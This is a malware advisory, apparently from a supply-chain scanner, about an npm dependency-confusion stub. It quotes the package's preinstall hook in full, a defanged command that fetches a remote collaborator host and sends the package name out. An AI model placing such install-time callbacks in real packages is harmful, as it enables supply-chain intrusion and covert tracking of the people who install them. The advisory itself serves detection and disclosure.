@oyo_tech/oyochat_user@100.0.0
Malicious code in @oyo_tech/oyochat_user (npm)
Analysis
The package is a minimal stub (package.json + index.js) that runs a preinstall hook on install. The hook executes `node -e "fetch('hxxps://dc[.]installed[.]da24gtar47nuepat1pu053x3cgyweiaom[.]oast[.]me/'+process.env.npm_package_name)"`, making an outbound HTTP request to an attacker-controlled Burp Collaborator (oast[.]me) host with the package name appended to the URL path. This beacons install activity to the remote host. The package is published at version 100.0.0 on a scoped name with no repository, consistent with a dependency-confusion/version-squat stub.
- analyzed by
- Leitwacht
- first seen
- Aug 18, 2026, 12:05 PM
- analyzed
- Aug 18, 2026, 12:05 PM
Related advisories
- optimizely-starter-kit-for-fastly-compute@1.0.1
- prism-registry@1.0.1
- fast-glob-fast@8.0.0
- space-items@1.0.0
- leb128x@1.0.1
- core-tailwindcss-utility@3.7.1
- runtime-health@1.0.1
- syjoy@1.0.0
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.